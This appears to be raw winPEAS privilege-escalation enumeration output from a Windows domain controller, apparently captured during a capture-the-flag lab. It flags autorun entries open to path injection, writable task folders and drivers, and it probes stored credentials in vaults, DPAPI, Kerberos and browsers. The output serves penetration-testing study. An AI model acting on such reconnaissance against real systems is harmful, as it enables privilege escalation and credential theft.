    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: clbcatq
    Folder: None (PATH Injection)
    File: clbcatq.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: combase
    Folder: None (PATH Injection)
    File: combase.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: COMDLG32
    Folder: None (PATH Injection)
    File: COMDLG32.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: coml2
    Folder: None (PATH Injection)
    File: coml2.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: gdi32
    Folder: None (PATH Injection)
    File: gdi32.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: gdiplus
    Folder: None (PATH Injection)
    File: gdiplus.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: IMAGEHLP
    Folder: None (PATH Injection)
    File: IMAGEHLP.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: IMM32
    Folder: None (PATH Injection)
    File: IMM32.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: kernel32
    Folder: None (PATH Injection)
    File: kernel32.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: LPK
    Folder: None (PATH Injection)
    File: LPK.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: MSCTF
    Folder: None (PATH Injection)
    File: MSCTF.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: MSVCRT
    Folder: None (PATH Injection)
    File: MSVCRT.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: NORMALIZ
    Folder: None (PATH Injection)
    File: NORMALIZ.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: NSI
    Folder: None (PATH Injection)
    File: NSI.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: ole32
    Folder: None (PATH Injection)
    File: ole32.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: OLEAUT32
    Folder: None (PATH Injection)
    File: OLEAUT32.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: PSAPI
    Folder: None (PATH Injection)
    File: PSAPI.DLL
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: rpcrt4
    Folder: None (PATH Injection)
    File: rpcrt4.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: sechost
    Folder: None (PATH Injection)
    File: sechost.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: Setupapi
    Folder: None (PATH Injection)
    File: Setupapi.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: SHELL32
    Folder: None (PATH Injection)
    File: SHELL32.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: SHLWAPI
    Folder: None (PATH Injection)
    File: SHLWAPI.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: user32
    Folder: None (PATH Injection)
    File: user32.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: WLDAP32
    Folder: None (PATH Injection)
    File: WLDAP32.dll
   =================================================================================================                                                                              


    RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
    Key: WS2_32
    Folder: None (PATH Injection)
    File: WS2_32.dll
   =================================================================================================                                                                              


    RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}                                                                     
    Key: StubPath
    Folder: None (PATH Injection)
    File: U
   =================================================================================================                                                                              


    RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}                                                                     
    Key: StubPath
    Folder: C:\Windows\System32
    File: C:\Windows\System32\Rundll32.exe C:\Windows\System32\mscories.dll,Install
   =================================================================================================                                                                              


    RegPath: HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}                                                         
    Key: StubPath
    Folder: C:\Windows\SysWOW64
    File: C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,Install
   =================================================================================================                                                                              


    Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
    File: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (Unquoted and Space detected)                                                                  
   =================================================================================================                                                                              


    Folder: C:\windows\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]
   =================================================================================================                                                                              


    Folder: C:\windows\system32\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]
   =================================================================================================                                                                              


    Folder: C:\windows
    File: C:\windows\system.ini
   =================================================================================================                                                                              


    Folder: C:\windows
    File: C:\windows\win.ini
   =================================================================================================                                                                              


ÉÍÍÍÍÍÍÍÍÍ͹ Scheduled Applications --Non Microsoft--
È Check if you can modify other users scheduled binaries https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries                                                                                       

ÉÍÍÍÍÍÍÍÍÍ͹ Device Drivers --Non Microsoft--
È Check 3rd party drivers for known vulnerabilities/rootkits. https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#vulnerable-drivers                 
    QLogic 10 GigE - 7.13.65.105 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\evbda.sys                                                                       
    NVIDIA nForce(TM) RAID Driver - 10.6.0.23 [NVIDIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\nvraid.sys                                                         
    VMware vSockets Service - 9.8.12.0 build-8538197 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vsock.sys                                                         
    QLogic Gigabit Ethernet - 7.12.31.105 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxvbda.sys                                                             
    VMware PCI VMCI Bus Device - 9.8.6.0 build-3966680 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmci.sys                                                        
    Intel Matrix Storage Manager driver - 8.6.2.1019 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\iaStorV.sys                                                  
    MegaRAID Software RAID - 15.02.2013.0129 [LSI Corporation, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasr.sys                                                       
    QLogic BR-series FC/FCoE HBA Stor Miniport Driver - 3.2.26.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bfadi.sys                                       
    QLogic BR-series FC/FCoE HBA Stor Miniport Driver - 3.2.26.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bfadfcoei.sys                                   
    Emulex WS2K12 Storport Miniport Driver x64 - 11.0.247.8000 01/26/2016 WS2K12 64 bit x64 [Emulex]: \\.\GLOBALROOT\SystemRoot\System32\drivers\elxfcoe.sys
    Emulex WS2K12 Storport Miniport Driver x64 - 11.0.247.8000 01/26/2016 WS2K12 64 bit x64 [Emulex]: \\.\GLOBALROOT\SystemRoot\System32\drivers\elxstor.sys
    QLogic Fibre Channel Stor Miniport Driver - 9.1.15.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ql2300i.sys                                             
    QLA40XX iSCSI Host Bus Adapter - 2.1.5.0 (STOREx wx64) [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ql40xx2i.sys                                          
    QLogic FCoE Stor Miniport Inbox Driver - 9.1.11.3 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\qlfcoei.sys                                                
    LSI 3ware RAID Controller - WindowsBlue [LSI]: \\.\GLOBALROOT\SystemRoot\System32\drivers\3ware.sys                                                                           
    AHCI 1.3 Device Driver - 1.1.3.277 [Advanced Micro Devices]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdsata.sys                                                           
    Storage Filter Driver - 1.1.3.277 [Advanced Micro Devices]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdxata.sys                                                            
    AMD Technology AHCI Compatible Controller - 3.7.1540.43 [AMD Technologies Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\amdsbs.sys                                        
    Adaptec RAID Controller - 7.5.0.32048 [PMC-Sierra, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\arcsas.sys                                                               
    Intel(R) Rapid Storage Technology driver (inbox) - 13.2.0.1022 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\iaStorAV.sys                                   
    LSI Fusion-MPT SAS Driver (StorPort) - 1.34.03.83 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas.sys                                                   
    Microsoftr Windowsr Operating System - 10.0.14304.1001 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas2i.sys                                            
    Microsoftr Windowsr Operating System - 10.0.14304.1001 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sas3i.sys                                         
    LSI SSS PCIe/Flash Driver (StorPort) - 2.10.61.81 [LSI Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\lsi_sss.sys                                                   
    Marvell Flash Controller -  1.0.5.1016  [Marvell Semiconductor, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\mvumis.sys                                                  
    MEGASAS RAID Controller Driver for Windows - 6.706.06.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\megasas.sys                                         
    NVIDIA nForce(TM) SATA Driver - 10.6.0.23 [NVIDIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\nvstor.sys                                                         
    MEGASAS RAID Controller Driver for Windows - 6.805.03.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas2i.sys                                       
    MEGASAS RAID Controller Driver for Windows - 6.603.06.00 [Avago Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas3i.sys                                       
    Microsoftr Windowsr Operating System - 2.60.01 [Silicon Integrated Systems Corp.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\SiSRaid2.sys                                    
    Microsoftr Windowsr Operating System - 6.1.6918.0 [Silicon Integrated Systems]: \\.\GLOBALROOT\SystemRoot\System32\drivers\sisraid4.sys                                       
     Promiser SuperTrak EX Series -  5.1.0000.10 [Promise Technology, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\stexstor.sys                                              
    PMC-Sierra HBA Controller - 1.3.0.10769 [PMC-Sierra]: \\.\GLOBALROOT\SystemRoot\System32\drivers\ADP80XX.SYS                                                                  
    Smart Array SAS/SATA Controller Media Driver - 8.0.4.0 Build 1 Media Driver (x86-64) [Hewlett-Packard Company]: \\.\GLOBALROOT\SystemRoot\System32\drivers\HpSAMD.sys
    VIA RAID driver - 7.0.9600,6352 [VIA Technologies Inc.,Ltd]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vsmraid.sys                                                           
    VIA StorX RAID Controller Driver - 8.0.9200.8110 [VIA Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vstxraid.sys                                                   
    QLogic iSCSI offload driver - 7.14.1.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxois.sys                                                             
    QLogic FCoE Offload driver - 7.14.4.1 [QLogic Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\bxfcoe.sys                                                             
    VMware Pointing PS/2 Device Driver - 12.5.7.0 build-3574480 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\System32\drivers\vmmouse.sys                                            
    VMware SVGA 3D - 8.16.01.0001 - build-9329519 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vm3dmp_loader.sys                                                    
    VMware SVGA 3D - 8.16.01.0001 - build-9329519 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vm3dmp.sys                                                           
    Intel(R) Gigabit Adapter - 12.15.22.6 [Intel Corporation]: \\.\GLOBALROOT\SystemRoot\System32\drivers\e1i63x64.sys                                                            
    VMware server memory controller - 7.4.2.0 build-5980934 [VMware, Inc.]: \\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vmmemctl.sys                                               


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Network Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                                                   

ÉÍÍÍÍÍÍÍÍÍ͹ Network Shares
  [X] Exception: Access denied 

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerate Network Mapped Drives (WMI)

ÉÍÍÍÍÍÍÍÍÍ͹ Host File

ÉÍÍÍÍÍÍÍÍÍ͹ Network Ifaces and known hosts
È The masks are only for the IPv4 addresses 
  [X] Exception: The requested protocol has not been configured into the system, or no implementation for it exists                                                               
    Ethernet0[00:50:56:B9:EE:58]: 10.10.10.161 / 255.255.255.0
        Gateways: 10.10.10.2
        DNSs: 127.0.0.1
    Loopback Pseudo-Interface 1[]: 127.0.0.1, ::1 / 255.0.0.0
        DNSs: fec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1

ÉÍÍÍÍÍÍÍÍÍ͹ Current TCP Listening Ports
È Check for services restricted from the outside 
  Enumerating IPv4 connections
                                                                                         
  Protocol   Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name

  TCP        0.0.0.0               88            0.0.0.0               0               Listening         588             lsass
  TCP        0.0.0.0               135           0.0.0.0               0               Listening         816             svchost
  TCP        0.0.0.0               389           0.0.0.0               0               Listening         588             lsass
  TCP        0.0.0.0               445           0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               464           0.0.0.0               0               Listening         588             lsass
  TCP        0.0.0.0               593           0.0.0.0               0               Listening         816             svchost
  TCP        0.0.0.0               636           0.0.0.0               0               Listening         588             lsass
  TCP        0.0.0.0               3268          0.0.0.0               0               Listening         588             lsass
  TCP        0.0.0.0               3269          0.0.0.0               0               Listening         588             lsass
  TCP        0.0.0.0               5985          0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               9389          0.0.0.0               0               Listening         1904            Microsoft.ActiveDirectory.WebServices
  TCP        0.0.0.0               47001         0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               49664         0.0.0.0               0               Listening         460             wininit
  TCP        0.0.0.0               49665         0.0.0.0               0               Listening         940             svchost
  TCP        0.0.0.0               49666         0.0.0.0               0               Listening         980             svchost
  TCP        0.0.0.0               49667         0.0.0.0               0               Listening         588             lsass
  TCP        0.0.0.0               49671         0.0.0.0               0               Listening         1096            svchost
  TCP        0.0.0.0               49676         0.0.0.0               0               Listening         588             lsass
  TCP        0.0.0.0               49677         0.0.0.0               0               Listening         588             lsass
  TCP        0.0.0.0               49684         0.0.0.0               0               Listening         580             services
  TCP        0.0.0.0               49703         0.0.0.0               0               Listening         1860            dns
  TCP        0.0.0.0               49958         0.0.0.0               0               Listening         1980            dfsrs
  TCP        10.10.10.161          53            0.0.0.0               0               Listening         1860            dns
  TCP        10.10.10.161          139           0.0.0.0               0               Listening         4               System
  TCP        10.10.10.161          389           10.10.10.161          49702           Established       588             lsass
  TCP        10.10.10.161          389           10.10.10.161          49755           Established       588             lsass
  TCP        10.10.10.161          389           10.10.10.161          49951           Established       588             lsass
  TCP        10.10.10.161          389           10.10.10.161          49955           Established       588             lsass
  TCP        10.10.10.161          389           10.10.10.161          52470           Established       588             lsass
  TCP        10.10.10.161          389           10.10.10.161          52482           Established       588             lsass
  TCP        10.10.10.161          389           10.10.10.161          52493           Established       588             lsass
  TCP        10.10.10.161          389           10.10.10.161          52499           Established       588             lsass
  TCP        10.10.10.161          389           10.10.10.161          52507           Established       588             lsass
  TCP        10.10.10.161          5985          10.10.14.10           48980           Established       4               System
  TCP        10.10.10.161          49702         10.10.10.161          389             Established       1860            dns
  TCP        10.10.10.161          49755         10.10.10.161          389             Established       3536            powershell
  TCP        10.10.10.161          49951         10.10.10.161          389             Established       1980            dfsrs
  TCP        10.10.10.161          49955         10.10.10.161          389             Established       1980            dfsrs
  TCP        10.10.10.161          52470         10.10.10.161          389             Established       3536            powershell
  TCP        10.10.10.161          52482         10.10.10.161          389             Established       1904            Microsoft.ActiveDirectory.WebServices
  TCP        10.10.10.161          52493         10.10.10.161          389             Established       1904            Microsoft.ActiveDirectory.WebServices
  TCP        10.10.10.161          52499         10.10.10.161          389             Established       1904            Microsoft.ActiveDirectory.WebServices
  TCP        10.10.10.161          52507         10.10.10.161          389             Established       1904            Microsoft.ActiveDirectory.WebServices
  TCP        127.0.0.1             53            0.0.0.0               0               Listening         1860            dns
  TCP        127.0.0.1             389           127.0.0.1             49681           Established       588             lsass
  TCP        127.0.0.1             389           127.0.0.1             49683           Established       588             lsass
  TCP        127.0.0.1             389           127.0.0.1             49700           Established       588             lsass
  TCP        127.0.0.1             389           127.0.0.1             49726           Established       588             lsass
  TCP        127.0.0.1             389           127.0.0.1             50609           Established       588             lsass
  TCP        127.0.0.1             389           127.0.0.1             52478           Established       588             lsass
  TCP        127.0.0.1             389           127.0.0.1             52489           Established       588             lsass
  TCP        127.0.0.1             389           127.0.0.1             52503           Established       588             lsass
  TCP        127.0.0.1             49681         127.0.0.1             389             Established       1940            ismserv
  TCP        127.0.0.1             49683         127.0.0.1             389             Established       1940            ismserv
  TCP        127.0.0.1             49700         127.0.0.1             389             Established       1860            dns
  TCP        127.0.0.1             49726         127.0.0.1             389             Established       1904            Microsoft.ActiveDirectory.WebServices
  TCP        127.0.0.1             50609         127.0.0.1             389             Established       1904            Microsoft.ActiveDirectory.WebServices
  TCP        127.0.0.1             52478         127.0.0.1             389             Established       1904            Microsoft.ActiveDirectory.WebServices
  TCP        127.0.0.1             52489         127.0.0.1             389             Established       1904            Microsoft.ActiveDirectory.WebServices
  TCP        127.0.0.1             52503         127.0.0.1             389             Established       1904            Microsoft.ActiveDirectory.WebServices

  Enumerating IPv6 connections
                                                                                         
  Protocol   Local Address                               Local Port    Remote Address                              Remote Port     State             Process ID      Process Name

  TCP        [::]                                        88            [::]                                        0               Listening         588             lsass
  TCP        [::]                                        135           [::]                                        0               Listening         816             svchost
  TCP        [::]                                        445           [::]                                        0               Listening         4               System
  TCP        [::]                                        464           [::]                                        0               Listening         588             lsass
  TCP        [::]                                        593           [::]                                        0               Listening         816             svchost
  TCP        [::]                                        5985          [::]                                        0               Listening         4               System
  TCP        [::]                                        9389          [::]                                        0               Listening         1904            Microsoft.ActiveDirectory.WebServices
  TCP        [::]                                        47001         [::]                                        0               Listening         4               System
  TCP        [::]                                        49664         [::]                                        0               Listening         460             wininit
  TCP        [::]                                        49665         [::]                                        0               Listening         940             svchost
  TCP        [::]                                        49666         [::]                                        0               Listening         980             svchost
  TCP        [::]                                        49667         [::]                                        0               Listening         588             lsass
  TCP        [::]                                        49671         [::]                                        0               Listening         1096            svchost
  TCP        [::]                                        49676         [::]                                        0               Listening         588             lsass
  TCP        [::]                                        49677         [::]                                        0               Listening         588             lsass
  TCP        [::]                                        49684         [::]                                        0               Listening         580             services
  TCP        [::]                                        49703         [::]                                        0               Listening         1860            dns
  TCP        [::]                                        49958         [::]                                        0               Listening         1980            dfsrs
  TCP        [::1]                                       53            [::]                                        0               Listening         1860            dns
  TCP        [::1]                                       135           [::1]                                       50944           Established       816             svchost
  TCP        [::1]                                       445           [::1]                                       52458           Established       4               System
  TCP        [::1]                                       9389          [::1]                                       49728           Established       1904            Microsoft.ActiveDirectory.WebServices
  TCP        [::1]                                       9389          [::1]                                       49729           Established       1904            Microsoft.ActiveDirectory.WebServices
  TCP        [::1]                                       9389          [::1]                                       52266           Established       1904            Microsoft.ActiveDirectory.WebServices
  TCP        [::1]                                       9389          [::1]                                       52267           Established       1904            Microsoft.ActiveDirectory.WebServices
  TCP        [::1]                                       9389          [::1]                                       52444           Established       1904            Microsoft.ActiveDirectory.WebServices
  TCP        [::1]                                       49667         [::1]                                       49707           Established       588             lsass
  TCP        [::1]                                       49667         [::1]                                       49745           Established       588             lsass
  TCP        [::1]                                       49667         [::1]                                       49970           Established       588             lsass
  TCP        [::1]                                       49667         [::1]                                       50414           Established       588             lsass
  TCP        [::1]                                       49707         [::1]                                       49667           Established       1088            dfssvc
  TCP        [::1]                                       49728         [::1]                                       9389            Established       3536            powershell
  TCP        [::1]                                       49729         [::1]                                       9389            Established       3536            powershell
  TCP        [::1]                                       49745         [::1]                                       49667           Established       1904            Microsoft.ActiveDirectory.WebServices
  TCP        [::1]                                       49970         [::1]                                       49667           Established       1980            dfsrs
  TCP        [::1]                                       50414         [::1]                                       49667           Established       588             lsass
  TCP        [::1]                                       50944         [::1]                                       135             Established       1904            Microsoft.ActiveDirectory.WebServices

ÉÍÍÍÍÍÍÍÍÍ͹ Current UDP Listening Ports
È Check for services restricted from the outside 
  Enumerating IPv4 connections
                                                                                         
  Protocol   Local Address         Local Port    Remote Address:Remote Port     Process ID        Process Name

  UDP        0.0.0.0               123           *:*                            932               svchost
  UDP        0.0.0.0               389           *:*                            588               lsass
  UDP        0.0.0.0               500           *:*                            980               svchost
  UDP        0.0.0.0               4500          *:*                            980               svchost
  UDP        0.0.0.0               5353          *:*                            996               svchost
  UDP        0.0.0.0               5355          *:*                            996               svchost
  UDP        10.10.10.161          88            *:*                            588               lsass
  UDP        10.10.10.161          137           *:*                            4                 System
  UDP        10.10.10.161          138           *:*                            4                 System
  UDP        10.10.10.161          464           *:*                            588               lsass
  UDP        127.0.0.1             50480         *:*                            1904              Microsoft.ActiveDirectory.WebServices
  UDP        127.0.0.1             53449         *:*                            588               lsass
  UDP        127.0.0.1             54850         *:*                            980               svchost
  UDP        127.0.0.1             55599         *:*                            2908              C:\Users\svc-alfresco\Documents\winPEASx64.exe
  UDP        127.0.0.1             56162         *:*                            3536              powershell
  UDP        127.0.0.1             60149         *:*                            996               svchost
  UDP        127.0.0.1             62071         *:*                            1940              ismserv
  UDP        127.0.0.1             63170         *:*                            1980              dfsrs

  Enumerating IPv6 connections
                                                                                         
  Protocol   Local Address                               Local Port    Remote Address:Remote Port     Process ID        Process Name

  UDP        [::]                                        123           *:*                            932               svchost
  UDP        [::]                                        500           *:*                            980               svchost
  UDP        [::]                                        4500          *:*                            980               svchost

ÉÍÍÍÍÍÍÍÍÍ͹ Firewall Rules
È Showing only DENY rules (too many ALLOW rules always) 
    Current Profiles: DOMAIN
    FirewallEnabled (Domain):    False
    FirewallEnabled (Private):    False
    FirewallEnabled (Public):    False
    DENY rules:

ÉÍÍÍÍÍÍÍÍÍ͹ DNS cached --limit 70--
    Entry                                 Name                                  Data
  [X] Exception: Access denied 

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Internet settings, zone and proxy configuration
  General Settings
  Hive        Key                                       Value
  HKCU        DisableCachingOfSSLPages                  0
  HKCU        IE5_UA_Backup_Flag                        5.0
  HKCU        PrivacyAdvanced                           1
  HKCU        SecureProtocols                           2688
  HKCU        User Agent                                Mozilla/4.0 (compatible; MSIE 8.0; Win32)
  HKCU        CertificateRevocation                     1
  HKCU        ZonesSecurityUpgrade                      System.Byte[]
  HKLM        EnablePunycode                            1

  Zone Maps                                                                              
  No URLs configured

  Zone Auth Settings                                                                     
  No Zone Auth Settings


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Windows Credentials ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                                                   

ÉÍÍÍÍÍÍÍÍÍ͹ Checking Windows Vault
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-manager-windows-vault                                                             
  [ERROR] Unable to enumerate vaults. Error (0x1061)
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Checking Credential manager
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-manager-windows-vault                                                             
    [!] Warning: if password contains non-printable characters, it will be printed as unicode base64 encoded string


  [!] Unable to enumerate credentials automatically, error: 'Win32Exception: System.ComponentModel.Win32Exception (0x80004005): A specified logon session does not exist. It may already have been terminated'
Please run:
cmdkey /list

ÉÍÍÍÍÍÍÍÍÍ͹ Saved RDP connections
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Remote Desktop Server/Client Settings
  RDP Server Settings
    Network Level Authentication            :
    Block Clipboard Redirection             :
    Block COM Port Redirection              :
    Block Drive Redirection                 :
    Block LPT Port Redirection              :
    Block PnP Device Redirection            :
    Block Printer Redirection               :
    Allow Smart Card Redirection            :

  RDP Client Settings                                                                    
    Disable Password Saving                 :       True
    Restricted Remote Administration        :       False

ÉÍÍÍÍÍÍÍÍÍ͹ Recently run commands
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Checking for DPAPI Master Keys
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Checking for DPAPI Credential Files
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Checking for RDCMan Settings Files
È Dump credentials from Remote Desktop Connection Manager https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#remote-desktop-credential-manager      
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for Kerberos tickets
È  https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for saved Wifi credentials
  [X] Exception: Unable to load DLL 'wlanapi.dll': The specified module could not be found. (Exception from HRESULT: 0x8007007E)                                                  
Enumerating WLAN using wlanapi.dll failed, trying to enumerate using 'netsh'
No saved Wifi credentials found

ÉÍÍÍÍÍÍÍÍÍ͹ Looking AppCmd.exe
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe                                                                                    
    Not Found
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ Looking SSClient.exe
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#scclient-sccm                                                                                 
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating SSCM - System Center Configuration Manager settings

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Security Packages Credentials
  [X] Exception: Couldn't parse nt_resp. Len: 0 Message bytes: 4e544c4d535350000300000001000100640000000000000065000000000000005800000000000000580000000c000c00580000000000000065000000058a80a20a0039380000000faf3b50e888a5a2f7166cb0816e88e7fa46004f00520045005300540000  


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Browsers Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                                                  

ÉÍÍÍÍÍÍÍÍÍ͹ Showing saved credentials for Firefox
    Info: if no credentials were listed, you might need to close the browser and try again.                                                                                       

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for Firefox DBs
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history                                                                              
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for GET credentials in Firefox history
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history                                                                              
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Showing saved credentials for Chrome
    Info: if no credentials were listed, you might need to close the browser and try again.                                                                                       

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for Chrome DBs
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history                                                                              
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for GET credentials in Chrome history
È  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history                                                                              
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Chrome bookmarks
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Showing saved credentials for Opera
    Info: if no credentials were listed, you might need to close the browser and try again.                                                                                       

ÉÍÍÍÍÍÍÍÍÍ͹ Showing saved credentials for Brave Browser
    Info: if no credentials were listed, you might need to close the browser and try again.                                                                                       

ÉÍÍÍÍÍÍÍÍÍ͹ Showing saved credentials for Internet Explorer (unsupported)
    Info: if no credentials were listed, you might need to close the browser and try again.                                                                                       

ÉÍÍÍÍÍÍÍÍÍ͹ Current IE tabs
